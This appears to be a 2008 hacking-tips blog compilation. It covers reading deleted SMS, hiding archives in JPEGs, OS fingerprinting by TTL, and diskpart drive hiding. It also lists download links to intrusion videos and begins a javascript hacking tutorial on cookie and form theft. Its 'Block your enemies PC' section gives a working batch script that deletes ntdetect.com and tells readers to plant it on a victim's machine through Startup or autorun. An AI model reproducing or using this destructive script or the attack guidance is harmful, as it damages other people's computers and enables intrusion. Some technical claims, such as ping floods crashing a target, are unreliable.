Here is the technique that must be followed to retrieve deleted SMS.
Required utility:
1) Any system explorer or file explorer program (eg. fileman or fexplorer.provided with the package)
Step 1) Open FexplorerStep
2) Select drive C: or D: depending on the memory in which the Sms messages have been saved.
Step 3) For example u selected c: , Then open “system” folder.
step 4) Then in “system” folder open “mail” folder.
step 5) Then in this folder u will see different folders (eg 0010001_s) and certain files (eg 00100000). These files are the actual messages. Browse through every folder and open all files till u get the sms u are looking for.
Step 6) For opening the files don’t choose options>file>open as it will show format not supported rather choose options>file>hex/text viewer.
By selecting the “Hex/ text viewer” u ll be able to open and read the deleted SMS message

How to hide a file in a image

1. Gather the file you wish to bind, and the image file, and place them in a folder. For the sake of this demonstration, I will be using C:\New Folder
-The image will hereby be referred to in all examples as fluffy.jpg
-The file will hereby be referred to in all examples as New Text Document.txt

2. Add the file/files you will be injecting into the image into a WinRar .rar or .zip. From here on this will be referred to as (secret.rar)

3. Open command prompt by going to Start > Run > cmd

4. In Command Prompt, navigate to the folder where your two files are by typing
cd location [ex: cd C:\New Folder]

5. Type [copy /b fluffy.jpg + secret.rar fluffy.jpg] (remove the brackets)

Congrats, as far as anyone viewing is concerned, this file looks like a JPEG, acts like a JPEG, and is a JPEG, yet it now contains your file.

In order to view/extract your file, there are two options that you can take

a) Change the file extension from fluffy.jpg to fluffy.rar, then open and your file is there
b) Leave the file extension as is, right click, open with WinRar and your file is there
Youtube link
http://www.youtube.com/watch?v=3Blt9-ojabk

System hacking tips

Administrator Password Guessing
Performing Automated Password Guessing
Legion
NTInfoScan
Defending Against Password Guessing
Monitoring Event Viewer Logs
VisualLast
Eavesdroppin on Network Password Exchange
Hacking Tool: L0phtCrack
Hacking Tool: KerbCrack
Privilege Escalation
Hacking Tool: GetAdmin
Hacking Tool: hk
Manual Password Cracking Algorithm
Automatic Password Cracking Algorithm
Password Types
Types of Password Attacks
Dictionary Attack
Brute Force Attack
Distributed Brute Force Attack
Password Change Interval
Hybrid Attack
Cracking Windows 2000 Passwords
Retrieving the SAM file
Redirecting SMB Logon to the Attacker
SMB Redirection
Hacking Tool: SMBRelay
Hacking Tool: SMBRelay2
SMBRelay Man-in-the-Middle (MITM)
SMBRelay MITM Countermeasures
Hacking Tool: SMBGrinder
Hacking Tool: SMBDie
Hacking Tool: NBTDeputy
NetBIOS DoS Attack
Hacking Tool: nbname
Hacking Tool: John the Ripper
LanManager Hash
Password Cracking Countermeasures
Keystroke Logger
Hacking Tool: Spector
AntiSpector
Hacking Tool: eBlaster
Hacking Tool: SpyAnywhere
Hacking Tool: IKS Software Logger
Hardware Tool: Hardware Key Logger
Hacking Tool: Rootkit
Planting Rootkit on Windows 2000 Machine
_rootkit_ embedded TCP/IP Stack
Rootkit Countermeasures
MD5 Checksum utility
Tripwire
Covering Tracks
Disabling Auditing
Auditpol
Clearing the Event Log
Hacking Tool: Elslave
Hacking Tool: Winzapper
Hacking Tool: Evidence Eliminator
Hidding Files
NTFS File Streaming
Hacking Tool: makestrm
NTFS Streams Countermeasures
LNS
Steganography
Hacking Tool: ImageHide
Hacking Tool: MP3Stego
Hacking Tool: Snow

http://rapidshare.com/files /99865070/System_Hacking.part03.rar
http://rapidshare.com/files/99870408/System_Hacking.part02.rar
http://rapidshare.com/files/99867492/System_Hacking.part01.rar

Remote operating system detection

Now a days we invite the so called victim to a webpage/blog
and with the help of a free web traker servive get all his details
as in browser/operating system and other details
but still i would like to share the traditional method as well

Detecting OS (operating system) is another most important step towards hacking into a system. We can even say that after tracing the IP of the system it is the most prior thing that should be done to get the root on a system cause without having knowledge about the OS running by the target system you cannot execute any system commands on the target system and thus your mission wont be accomplished. In here I have figure out the basics of detecting OS remotely without having physical access to the system. There are various method of detecting OS like by trace routing the victim’s IP , by pinging the IP , by using telnet and also by using a terminal. But from my research I have concluded that detecting OS through ping or tracerout is the most simplest but effective way of determining the operating system running in the remote computer without having physical access to the system. Since my aim of writing articles is to make things clear for beginners and intermediate so I will explain remote os detecting through ping method which is very easy to understand even for peoples totally new to computers.. yeah yeah.. I know you call them newbies..right ?? J J J

REMOTE OS DETECTION USING PING METHOD

What is PING and what is its utility ?

Ping is an MSDOS utility provided for windows version of DOS and for Unix and operating systems having UNIX as the core kernel. It runs in dos box in windows and directly in UNIX platform. In this manual I will give more stress on the MSDOS version of ping.

Ping is an utility used for sending and receiving packets of data to a target system using its IP and thus from the outputs you can figure out many information about the target system.
In remote os detection we are mainly concerned with the TTL values of the received data packets.

Note: When you send or receive a file over the internet it is not send at once. Instead it is broken down at the source system and these broken fragments of data know as data packets are send through the internet and these data packets are gathered together by the target system according to an algorithm constructed by the source system.
For example if I send a picture of size 400 KB to my girl friend (hey girls out there remember I don’t yet have a gf in reality) then what actually happens is that my system breaks the data into data packets, say the file of 400 KB has been broken down into 4 data packets each having a size of 100 KB and having a name. These data packets are assigned a code known as the TTL value of the data packets by my operating system. Then these data packets are gathered and the original file is formed from these data packets at the target system.

Example:

C:\windows>ping/?

Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]

[-r count] [-s count] [[-j host-list] | [-k host-list]]

[-w timeout] target_name

Options:
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.

there are various switches available for ping. Above I have given a list of all the switches available in the DOS version of ping. Using the –t switch you can continuously ping a target until it is crashed down. I am sure you are probably wondering how will it crash down the remote system. The answer is quite simple. If you ping the remote system continuously then what happens is that slowly the RAM of the target system is overloaded with these stack data and compels the system to restart or crashes it. You can also use the –l switch to specify the amount of data packet to be send at a time.

But in this article I am not concerned with crashing down a remote system cause its not that easy as it seems to be, there are many other tricks for it and its not possible to crash down a system of present technology just by simple ping. I am concerned with the TTL values of the output that you will get after pinging a system. You can use –n switch with ping to specify the number of echo (ie data packets) to be send to the target system. The default number is 4.

Example:

C:\windows> ping –n 10 127.0.0.1

This command will ping 127.0.0.1 with 10 packets of data and after that will give you an output.

Now I think its time for a real example which I have executed on my system.

C:\windows>ping 127.0.0.1

Pinging 127.0.0.1 with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<1ms>TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms>TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms>TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms>TTL=128
(or check http://members.cox.net/~ndav1/self_published/TTL_values.html)

Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

Here I have pinged the IP 127.0.0.1 (offline ip of any system) with default ping. Here I am getting TTL value as 128. This is the thing what we need for remote os detection.

What is TTL value ?

TTL value is nothing but a simple code assigned to the out going data packets by the operating system of a computer. The TTL value assigned to the out going data packets depends on the operating system and it is the same for a particular operating system. As for example if you ping a system running windows 98 or earlier versions of windows NT with service packs (I don’t know exactly about the TTL values of recent versions of Windows NT but from my research I think it’s the same as previous versions cause the TTL value even in Windows XP is 128) you will get the TTL value as 128, thus from this TTL value you can easily say that the target system is running Microsoft Windows.

TTL values of commonly used Operating Systems

OS VERSION PLATFORM TTL

Windows 9x/NT Intel 32
Windows 9x/NT Intel 128
Windows 2000 Intel 128
DigitalUnix 4.0 Alpha 60
Unisys x Mainframe 64
Linux 2.2.x Intel 64
FTX(UNIX) 3.3 STRATUS 64
SCO R5 Compaq 64
Netware 4.11 Intel 128
AIX 4.3.x IBM/RS6000 60
AIX 4.2.x IBM/RS6000 60
Cisco 11.2 7507 60
Cisco 12.0 2514 255
IRIX 6.x SGI 60
FreeBSD 3.x Intel 64
OpenBSD 2.x Intel 64
Solaris 8 Intel/Sparc 64
Solaris 2.x Intel/Sparc 255

Well these are not all. There are many more TTL values of many other operating systems. But generally most systems lies within this list.

Now lets try this manual practically and find out the operating system running by the IP 202.178.64.19.

C:\windows>ping 202.178.64.19

Pinging 202.178.64.19 with 32 bytes of data:

Reply from 202.178.64.19: bytes=32 time<1ms>TTL=128
Reply from 202.178.64.19: bytes=32 time<1ms>TTL=128
Reply from 202.178.64.19: bytes=32 time<1ms>TTL=128
Reply from 202.178.64.19: bytes=32 time<1ms>TTL=128

Ping statistics for 202.178.64.19:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

Well from the output you can figure out many informations. First 4 packets of data each of 32 bytes has been send to 202.178.64.19. In response the target system has responded with data packets of TTL value as 128.
Now we can easily say that the system 202.178.64.19 is running windows.

ERROR CORRECTION IN SOME CASES

There is a possibility of error in TTL values that you receive. Even though the source system send a TTL value of 128 you may receive the TTL value as 120. Well nothing to worry cause its due to the fact that routers reduce the TTL value by 1.
Don’t worry I’ll explain and made things much clearer for you.

It’s a fact that some times routers may reduce the TTL value assigned to the data packets by the source OS by 1.
In that case you have to find out how many routers are there in between your system and the target system and then simply add the number of routers to the received TTL values and you will get the original TTL value.

To find out how many routers there are in between your system and the target system just perform a normal and simple tracert to that IP.
For more information about tracing an IP read my article ‘TRACING IP” in
After tracing the IP using tracert tool of dos suppose you find that there are 10 routers between you and the target system then just simply add 10 to the TTL value that you have received and you will get the original TTL value.

And once you get the original TTL value then its as simple as changing girl friend to find out the operating system running by the remote computer. Just match the TTL value with the above chart and you will find out the operating system info.

How to create con folder in xp

CON is a reserve world in windows operating system.
that's why we can not create the folder named as
CON.

But by command prompt we can do this

STEP1: goto command prompt
STEP2: type in prompt e:\> "mkdir \\.\e:\con"
STEP3: verify by typing "dir \\.\e:\con"
STEP4: delete the file or folder "rmdir \\.\e:\con"

ollowing file names in Windows are reserved because they represent devices:
con, con.* -> the console
prn, prn.* -> the default printer, as a character device
aux, aux.* -> the default serial terminal, as a character device
lpt1, lpt2, lpt3, lpt4, lpt5, lpt6, lpt7, lpt8, lpt9 -> the parallel ports, as character devices
lpt1.*, lpt2.*, lpt3.*, lpt4.*, lpt5.*, lpt6.*, lpt7.*, lpt8.*, lpt9.*
com1, com2, com3, com4, com5, com6, com7, com8, com9 -> the serial ports, as character devices
com1.*, com2.*, com3.*, com4.*, com5.*, com6.*, com7.*, com8.*, com9.*
nul, nul.* -> the NUL or "waste bit bucket" or "black hole for bits" or "/dev/null" device

Such files are considered to "exist" in all directories, so if you have a filename like "c:\temp\con", you're talking about the CON device, not about a normal disk file called "con". They're not listed using the "dir" command, or using APIs.

How to create con folder

Tuesday, September 23, 2008

Hide your Particular Drive

If u r having any important docs and want to hide it temporarily, dont wory windows XP provides (not officialy ) a utility by which u can hide urs one or more drives .

1. Go to Start > run > type "diskpart".
a dos window will appear with following di$$$$$$ion.
DISKPART>

2. then type "list volume"

this will look like it

Volume### Ltr Label Fs Type Size Status Info
-------------- ---- ------ --- ----- ---- ------- -----

Volume 0 F DC-ROM
Volume 1 C NTFS Partition 7000MB Healthy
Volume 2 D soft NTFS Partition 8000MB Healthy
Volume 3 E ---- NTFS Partition 8000MB Healthy

3.if u wanna hide drive E then type "select volume 3"

then a message will appear in same windows { Volume 3 is the selected volume}

4.now type " remove letter E"
now a message will come { Diskpart Removed the Drive letter }
sometime it requires the reboot the computer .

Diskpart will remove the letter .Windows XP is not having capabilty to identify the unknown volume.

Don't afraid ur Data will remain same .
to Come back the Drive repeat the process . but in 4th step which is shown in this post replace " remove" to "assign"
i mean type " assign letter E"

List of Hacking Tutorial Video Collection

1. Hacking Server
Hacking Web Server and installing Sock

http://rapidshare.com/files/47266934/15_my_noski.rar.html

2. Hacking Site
Hacking Site and getting root

http://rapidshare.com/files/47266961/16_history_vzlom.rar.html

3. Brutus
Use Brutus to crack a box running telnet.

http://rapidshare.com/files/47266925/17_brutus1.avi.html

4. Fusion
SQL injection on PHP_Fusion Site.

http://rapidshare.com/files/47266924/18_fusion.rar.html

5. Wireless
This video shows a real life wireless hack.

http://rapidshare.com/files/47266930/19_lequipe.rar.html

6. Netbios
This video shows how to exploit file sharing.

http://rapidshare.com/files/47266927/20_netbios.rar.html

7. ARP Spoofing
This video shows how to perform an ARP Spoofing attack.

http://rapidshare.com/files/47266928/21_ARPSpoofing.rar.html

8. Jpeg exploit
This video shows you how to use the jpeg exploit

http://rapidshare.com/files/47266945/22_jpegadmin.rar.html

9. Hacking ParaChat
A video that shows you how to hack parachat v5.5

http://rapidshare.com/files/47266937/23_ParaChat1.rar.html

10. E-mail
Tracing an E-mail and finding out more about the host that sent it and its IP.

http://rapidshare.com/files/47266940/24_e-mail-ip.avi.html

11. Boot from Phlak and run Chkrootkit to detect a compromise

http://rapidshare.com/files/47266907/31_chkrootkit1.swf.html

12. WiGLE, JiGLE and Google Earth: Mapping out your wardrive

http://rapidshare.com/files/47266947/45_wigle1.swf.html

13. Using VirtualDub and a cheap webcam as a camcorder
I thought this might be of use to those that would like to submit something to Infonomicon TV or Hack TV but lack the cash for a proper MiniDV camcorder.

http://rapidshare.com/files/47266948/49_cheapcamcorder.avi.html

14. Using VMware Player to run Live CDs (Bootable ISOs)
In this video I show how to use the free VMware Player to run Live CDs like Knoppix, Auditor or Bart's PE Builder from an ISO

http://rapidshare.com/files/47266953/52_vmwareplayerlivecd.swf.html

15. Make your own VMs with hard drive for free: VMware Player + VMX Builder

http://rapidshare.com/files/47266915/54_vmxbuilder.swf.html

16. Yahoo.com
Vulnerabilities of the post service yahoo.com

http://rapidshare.com/files/47266926/57_yahoo.com.rar.html

17. wwwHack
Use of wwwhack tool on vBulletin

http://rapidshare.com/files/47266914/59_wwwhack.rar.html

18. XSS
Cross site scripting (XSS) in MercuryBoard

http://rapidshare.com/files/47266912/60_new_xss.rar.html

19. John The Ripper
Basic work with "John The Ripper"

http://rapidshare.com/files/47266919/61_jtr.rar.html

20. PHP/SQL Injection
Site hacked with php exploit and known SQL injection.

http://rapidshare.com/files/47266910/63_php_and_sql.rar.html

21. UBB threads 6.2.3
UBB Forum hacked with SQL injection.

http://rapidshare.com/files/47266920/64_ubb.rar.html

22. Bitfrost Server Crypting
This is nice video for any one learning how to add bytes to make there server undetectable.
RAR-Password == Crypt

http://rapidshare.com/files/47266968/66_Bifrost_Server_Cryp.rar.html

23. Microsoft.com Bugs
Nice videos shows of old bug that was exploited on the site

http://rapidshare.com/files/47266904/67_MICROSOFT.rar.html

24. Interview with Kevin Mitnick
He was on fbi's most wanted list, a nitrous Hacker but now see Kevin's Interview after being freed what he has to say about his past and future.

http://rapidshare.com/files/47266959/68_kevin.rar.html

25. Unix Shell Fundamentals : VTC Unix Shell Fundamentals Video Tutorials. You need Quicktime player to view the videos.

http://rapidshare.com/files/47266984/69_UnixShellFund.rar.html

26. C++ Video tutorials
Nice C/C++ Shockwave videos

http://rapidshare.com/files/47266939/70_C__.rar.html

27. Tunneling Exploits via SSH
An intensive demo showing how SSH Tunneling techniques can be used to exploit an interal, non routable network.

http://rapidshare.com/files/47266931/74_see-sec-ssh-dcom-tunneling.zip.html

28. Cracking WEP in 10 Minutes
A short demo of a wireless WEP attack. This is an interesting technique, where packets are injected to the access point, making it release weak IVs.
You'll think twice about WEP after this

http://rapidshare.com/files/47266943/75_see-sec-wepcrack.zip.html

29. A classic client side attack
The MS06-001 vulnerability was used to execute a reverse connect shellcode. More information about this vulnerability can be found at the Microsoft site - MS06-001.

http://rapidshare.com/files/47266911/76_see-sec-client-side.rar.html

30. Blind MySQL
Demonstration of Blind MySQL Injection (bsqlbf)

http://rapidshare.com/files/47266929/77_Blind_MySQL.rar.html

31. D-Link Wireless
Intruders D-Link Wireless Access Point Configuration Disclosure

http://rapidshare.com/files/47266909/78_D-Link_Wireless.rar.html

32. Mysql bftools
Demonstration of Blind MySQL Injection (mysql_bftools)

http://rapidshare.com/files/47266923/79_mysql_bftools.rar.html

33. PHP Remote File
PHP Remote File Inclusion Windows Backdoor.

http://rapidshare.com/files/47266941/80_PHP_Remote.rar.html

34. vBulletin XSS
vBulletin XSS Demonstration with Session Hijacking

http://rapidshare.com/files/47266955/81_vBulletin_XSS.rar.html

35. wbb portal hacked by XSS

http://rapidshare.com/files/47266950/82_wbb_portal.rar.html

36. Reverse Engineering
Reverse Engineering with LD PRELOAD

http://rapidshare.com/files/47266965/83_reverse.rar.html

37. SWF File Vulnerability
Multiple Websites Embedded SWF File Vulnerability Demonstration

http://rapidshare.com/files/47266905/84_SWF_Vul_Demo.rar.html

38. IPB 1.3 SQL
Invasion Power Board 1.3 SQL Injection Exploit

http://rapidshare.com/files/47266890/86_IPB_SQL.rar.html

39. Qnix Buffer Overflows
Qnix Demonstrating Exploration of Simple Buffer Overflows

http://rapidshare.com/files/47266902/87_buff.rar.html

40. ASP SQL
Simple ASP Administrator SQL Injection

http://rapidshare.com/files/47266901/88_asp_sql.rar.html

41. 0-DAY Simple SQL Injection
A film project about a cracker with the name zer0day. (Hacking with Linux -php)

http://rapidshare.com/files/47266933/89_simple-sql-injection.zip.html

42. Hacker Defender Movie
Shows how Brilliant Hacker defender bypasses several rootkits detectors.
You can see bypassing IceSword, BlackLight, RootkitRevealer and more.

http://rapidshare.com/files/47266887/90_Brilliant_Hacker_defender_presentation_movie_MSV1.rar.html

43. NASA Department website Hacked

http://rapidshare.com/files/47266900/92_meh.zip.html

44. Vbulletin 3.5.4 exploit)
By M4k3 from www.pldsoft.com shows how to use Exploit : www.vicitimsite.com/forumpath/install/upgrade.php?step= [any letters, not numbers!]

http://rapidshare.com/files/47266892/93_vbulletin.new.rar.html

45. Linux network monitor
This video shows you how to set up ntop, a network monitoring program, on GNU/Linux.
Ntop features a web interface that displays tons of information about bandwidth utilization, traffic patterns, etc.
It even shows you what applications are using bandwidth on your network such as ftp, bittorrent, http, dns, etc.

http://rapidshare.com/files/47266883/95_CBT4Free-Linux_Network_Monitor.zip.html

46. Linux DNS Server
This video explains how to set up a DNS server on a GNU/Linux server.
In the video I explain a little bit about how DNS works, then I install and configure BIND in a chroot jail on 2 DNS servers in a master/slave relationship.
This video is specifically tailored to setting up DNS for a web server

http://rapidshare.com/files/47266913/97_CBT4Free-Linux_DNS_Server.zip.html

47. Windows Web Server
This video details the installation and configuration of Apache, MySQL, and PHP on windows.
This video is made specifically or those using windows 2000 Pro / XP Home / XP Pro

http://rapidshare.com/files/47266898/98_windows_Web_Server.zip.html

48. Win Server 2003 IIS and DNS (4mb)
This video shows how to install and configure IIS and DNS on windows Server 2003 for virtual hosting.
These procedures will work with all versions of windows Server 2003 and possibly with windows 2000 Server

http://rapidshare.com/files/47266891/99_windows_Server_2003_IIS_and_DNS.zip.html

49. DeluxeBB 1.06 Exploit)
Remote SQL Injection Exploit

http://rapidshare.com/files/47266896/100_live585.rar.html

50. NetBios Live Hack
Shows how to use Super Scan to Hack Netbios opened on remote PC (Port 139)

http://rapidshare.com/files/47266881/101_netbios585.rar.html

51. Classified
Shows how site classified is Hacked

http://rapidshare.com/files/47266894/102_site585.rar.html

List of Hacking Tutorial Video Collection

Thursday, September 18, 2008

Block your enemies PC

Copy the code below @ the notepad

echo off
C:
cd..
cd..
cd..
attrib -r -s -h ntdetect.com
del ntdetect.com
echo on
print U r a bloody LOSER HACKER is a Winner

Save this file as virus.bat or any other name with .bat extension, a kinda batch file.

Double click it in the victim's computer or Put it in Startup of Ur enemy or put it in a CD and set it in the autorun.

With this activated once the computer will run perfectly

On Restart, it wont start again and U will have to format it
(Exceptions are only if U know how to use DOS).

Wednesday, September 17, 2008

Hacking with Javascript.

Hacking with Javascript.

Javascript is used as a client side scripting language, meaning that your browser is what interprets it. It is used on webpages and is secure (for the most part) since it cannot touch any files on your hard drive (besides cookies). It also cannot read/write any files on the server. Knowing javascript can help you in both creating dynamic webpages, meaning webpages that change, and hacking. First I will start with the basic javascript syntax, then I will list a few sites where you can learn more, and then I will list a few ways you can use javascript to hack.

There are a few benifits of knowing javascript. For starters, it is really the only (fully supported) language that you can use on a website making it a very popular language on the net. It is very easy to learn and shares common syntax with many other languages. And it is completely open source, if you find something you like done in javascript you can simply view the source of the page and figure out how it's done. The reason I first got into javascript was because back before I got into hacking I wanted to make my own webpage. I learned HTML very quickly and saw Dynamic HTML (DHTML) mentioned in a few tutorials. I then ventured into the land of javascript making simple scripts and usful features to my site.

It was only after I was pretty good with javascript and got into hacking that I slowly saw it's potential to be used milisously. Many javascript techniques are pretty simple and involve tricking the user into doing something. Almost pure social engineering with a bit of help from javascript. After using simple javascript tricks to fake login pages for webbased email I thought about other ways javascript could be used to aid my hacking, I studied it on and off for around a year. Some of these techniques are used by millions of people, some I came up with an are purely theorectical. I hope you will realize how much javascript can aid a hacker.

1. Basic Syntax
2. Places To Learn More Advanced Javascript
3. Banner Busting & Killing Frames
4. Getting Past Scripts That Filter Javascript
5. Stealing Cookies
6. Stealing Forms
7. Gaining Info On Users
8. Stories Of Javascript Hacks
9. Conclusion

1. Basic Syntax
The basics of javascript are fairly easy if you have programmed anything before, although javascript is not java, if you know java you should have no problems learning it. Same for any other programming language, as most share the same basics as javascript uses. This tutorial might not be for the complete newbie. I would like to be able to do a tutorial like that, but I don't have the time or patience to write one. To begin if you don't know html you must learn it first!

Javascript starts with the tag Anything between these two tags is interpreted as javascript by the browser. Remember this! Cause a few hacks use the fact that if you use .. either way is fine. I would also like to mention that many scripts have right before the tag, this is because they would like to make it compatible with other browsers that do not support javascript. Again, either way is fine, but I will be using the because that is how I learned to script and I got used to putting it in.

Javascript uses the same basic elements as other programming languages.. Such as variables, flow control, and functions. The only difference is that javascript is a lot more simplified, so anyone with some programming experience can learn javascript very quickly. The hardest part of scripting javascript is to get it to work in all browsers. I will now go over the basics of variables:

to define a variable as a number you do: var name = 1;
to define a variable as a string you do: var name = 'value';

A variable is basically the same in all programming languages. I might also point out that javascript does not support pointers. No structs to make your own variables either. Only variable types are defined by 'var'. This can be a hard thing to understand at first, but javascript is much like C++ in how it handles variables and strings. A string is a group of characters, like: 'word', which is a string. When you see something like document.write(something); it will try to print whatever is in the variable something. If you do document.write('something'); or document.write("something"); it will print the string 'something'. Now that you got the variables down lets see how to use arithmetic operators. This will make 2 variables and add them together to make a new word:

b0ilerowns

first we define the variable 'name' as b0iler, then I define 'adjective' as owns. Then the document.write() function writes it to the page as 'name'+'adjective' or b0ilerowns. If we wanted a space we could have did document.write(name+' '+adjective);

Escaping characters - This is an important concept in programming, and extremely important in secure programming for other languages.. javascript doesn't really need to worry about secure programming practice since there is nothing that can be gained on the server from exploitting javascript. So what is "escaping"? It is putting a \ in front of certain characters, such as ' and ". If we wanted to print out:

b0iler's website

We couldn't do:

document.write('b0iler's website');

because the browser would read b0iler and see the ' then stop the string. We need to add a \ before the ' so that the browser knows to print ' and not interpret it as the ending ' of the string. So here is how we could print it:
document.write('b0iler\'s website');

There are two types of comments in javascript. // which only lasts till the end of the line, and /* which goes as many as far as possible until it reaches */ I'll demonstrate:

this will show up

The only thing that script will do is print "this will show up". Everything else is in comments which are not rendered as javascript by the browser.

Flow Control is basically changing what the program does depending on whether something is true or not. Again, if you have had any previous programming experience this is old stuff. You can do this a few different ways different ways. The simplest is the if-then-else statements. Here is an example:

Lets break this down step by step. First I create the variable 'name' and define it as b0iler. Then I check if 'name' is equal to "b0iler" if it is then I write 'b0iler is a really cool guy!', else (if name isn't equal to b0iler) it prints 'b0iler can not define variables worth a hoot!'. You will notice that I put { and } around the actions after the if and else statements. You do this so that javascript knows how much to do when it is true. When I say true think of it this way:

if (name == 'b0iler')
as
if the variable name is equal to 'b0iler'

if the statement name == 'b0iler' is false (name does not equal 'b0iler') then whatever is in the {} (curely brackets) is skipped.

We now run into relational and equality operators. The relational operators are as follows:

> - Greater than, if the left is greater than the right the statement is true.
< - Less than, if the left is lesser than the right the statement is true.
>= - Greater than or equal to. If the left is greater than or equal to the right it is true.
<= - Less than or equal to. If the left is lesser than or equal to the right it is true.

So lets run through a quick example of this, in this example the variable 'lower' is set to 1 and the variable 'higher' is set to 10. If lower is less than higher then we add 10 to lower, otherwise we messed up assigning the variables (or with the if statement).

and now the equality operators, you have already seen one of them in an example: if (name == 'b0iler') the equality operators are == for "equal to" and != for "not equal to". Make sure you always put two equal signs (==) because if you put only one (=) then it will not check for equality. This is a common mistake that is often overlooked.

Now we will get into loops, loops continue the statements in between the curly brackets {} until they are no longer true. There are 2 main types of loops I will cover: while and for loops. Here is an example of a while loop:

First 'name' is set to b0iler, then 'namenumber' is set to 1. Here is where we hit the loop, it is a while loop. What happens is while namenumber is less than 5 it does the following 3 commands inside the brackets {}: name = name + name; document.write(name); namenumber = namenumber + 1; The first statement doubles the length of 'name' by adding itself on to itself. The second statement prints 'name'. And the third statement increases 'namenumber' by 1. So since 'namenumber' goes up 1 each time through the loop, the loop will go through 4 times. After the 4th time 'namenumber' will be 5, so the statement namenumber < 5 will no longer be true.

Let me quickly go over some short cuts to standard math operators, these shortcuts are:

variable++; // adds 1 to variable.
variable--; // subtracts 1 from variable.
variable+= something; // adds something to variable. Make sure to use 's if it is a string like:
variable+= 'string';
variable-= 3; // subtracts 3 from variable
variable*= 2; // multiples variable by 2.

Next loop is the for loop. This loop is unique in that it (defines a variable; then checks if a condition is true; and finally changes a variable after each time through the loop). For the example lets say you want to do the same thing as above. This is how you would do it with a for loop:

b0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0iler

First the variable name is defined, then it starts the for loop. It assigns 1 to namenumber, then checks if namenumber is less than 5 every time through the loop, and it increases namenumber by 1 every time through the loop (variablename++ means increase the variable by 1). The next 2 lines are the same as with the while loop. But since the for loop handles the declaration of namenumber and the increase every time through the loop it makes it simpler for the scripter and easier to keep track of for people trying to read the code. You can use a while loop if you want, it is all up to the scripter's preference.

Lets go over that for loop one more time, just for clarity. for (done only the first time; loop continues while this is true; done after every time through the loop)

That's it for learning javascript, this was really basic and pretty much covered things that are constant in most languages. For javascript specific guides check out the next section of the tutorial. This section was only to give the user enough info to understand the rest of the tutorial. I wish I could go over more, but there are way better tutorials for advanced javascript then one I could ever write.

2. Places To Learn More Advanced Javascript

I will just provide a list of tutorials and sites with more advanced javascript. If you wish to learn javascript and be able to write your own you will have to look at other people's scripts for examples and read a few more tutorials. I just went over the very basics so you wouldn't be lost.

Pagefinder - Get INSIDERinfo on thousands of topics ... rial2.html - good examples, not really advanced.. prolly a medium level javascript tutorial.

http://www.webdevelopersjournal.com/art ... ents2.html - A javascript tutorial on event handles. Fairly advanced.

Rouyer Design Portfolio Web Site - a classic site, go to the tutorials section and learn a lot of advanced javascript made easy.

http://server1.wsabstract.com/javatutors - Goes over some specific aspects to advanced javascript work. Useful in many situations.

Advanced JavaScript Tutorials - The advanced string handling and the forms tutorials are good, I would suggest reading them if you wish to get more into javascripting.

Coolnerd's Javascript Resource - A nice list of al the javascript operators, statements, objects.. although it might be alittle old I still use it all the time.

If you want to create your own javascripts for yoursite be warned. Javascripts are very limited in power, but can be the solution to many simple problems. You will have to spend a few weeks learning more advanced javascript in order to make anything really useful. Creating that awsome DHTML (Dynamic HTML) feels really good Dynamic HTML is pretty much javascript that interacts with the user, css, and layers - , , and .

Here is some links to good dynamic html sites:

The Dynamic Duo, Cross browser dynamic html tutorial - Goes over things step by step.

Taylor's dynamic HTML tutorial - That nice webmonkey style that everyone loves.

Curious Eye DHTML tutorial - This will really get you going making cross browser Dynamic HTML.

Intro to DHTML - Might be nice if you aren't as html and javascript knowledgable as most DHTML beginners.

Good luck with your adventure into javascript =)

3. Banner Busting & Killing Frames

I call it banner busting, it is when you use javascript (or other tags) that aren't rendered by the browser the same as normal html tags to get around a popup or banner that free sites automatically put on your page. The basic idea of this is to have a tag that isn't rendered as html right before the html the site adds on their banner so that user's browsers do not see the banner. There is only really one key thing you need to find out in order to kill that banner. This is what tag the site uses as a "key". What I mean by this is what tag does the banner they add come before or after? Try putting up a page with just:

text

now upload that page and view it in a browser. View the source of the page and find where the site added it's banner html. If it came after the and before the then you need to see if it came before or after the which is in between those. If it is before, then it is the tag that is the key tag which the site adds it's banner after. If it is under the than you know it puts it after the tag.

So now that we know where the site adds it's banner html what do we do to stop it? We try to make a "fake" tag and hopefully the site adds it's banner html to the fake one instead. Then we use javascript to print the real one. We can do a few things, here is the list:

the basic to stop it.

-this keytag is the real one.

If all worked out you should have a page with no annoying popups or flashing banners. If not I guess you will have to play around a little and figure it out for yourself. Since every free host uses different keytags and methods of adding it's banner I can't go over them all one by one.

I decided to go over a real example of a free site that add popup ads or banners to every page you have. I'll be using angelfire since I hate them and because that's the one I picked out of my lucky hat. Just remember that sites can change the way they add banners anytime they feel like, so this method might not work the same way as I am showing. Doing this also breaks the TOS (Terms Of Service) with your host, so you might get your site taken down without any warning. Always have complete backups of your site on your harddrive, espechially if you have a hacking site or are breaking the TOS.

angelfire

------------------------
begin
------------------------

rest of test page

------------------------
end
------------------------

as you can see angelfire puts their ad right after the tag. All they are using to protect us from getting rid of the ad is a so.. we can put something like this to defeat the ad:

So angelfire's server will add the javascript for thier advertisment after the first they see. That will put the ad after . This means that user's browsers will think that and the angelfires ad is css (cascading style sheet).. which is the